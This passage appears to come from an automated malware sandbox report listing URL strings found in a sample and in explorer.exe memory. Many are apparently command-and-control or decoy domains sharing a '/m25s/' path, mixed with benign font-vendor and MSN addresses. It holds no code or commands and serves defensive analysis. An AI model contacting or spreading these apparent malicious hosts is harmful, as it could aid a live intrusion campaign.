          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shopReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond/m25s/www.uykoii.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bondReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vip
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vip/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vip/m25s/www.cskuvq.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vipReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyz/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyz/m25s/www.dt5r.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyzReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.click
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.click/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.click/m25s/www.xewaov.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.clickReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond/m25s/www.yeloma-treatment-82106.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bondReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.top
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.top/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.top/m25s/www.attoomasteracademy.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.topReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/www.6874.club
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zoneReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.net
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.net/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.net/m25s/www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.netReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.online/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.online/m25s/www.6uzh.digital
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.onlineReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bond/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bond/m25s/www.pslag-hal-2.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bondReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/www.ehills.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.todayReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shop
          Source: explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shop/m25s/www.pringhillinfos.net
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shopReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/www.armanshop.xyz
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.netReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/www.ierra777.vip
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/www.oches-a-credito-es.bond
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyzReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bond/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bond/m25s/www.araghospitality.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bondReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000004.00000000.1716978522.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2638429604.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4159088871.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2664758561.0000000004EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k6
          Source: explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4159088871.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2664758561.0000000004EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2696073472.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.000000000971D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 0000000F.00000003.2690919232.00000000097A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2692315620.0000000009583000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004EAA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000095A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2696073472.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009658000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.000000000965F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000002.2633149369.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000F.00000003.3928998336.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.0000000009569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?K
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000095A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2696073472.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009658000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.000000000965F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000004.00000002.2633149369.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
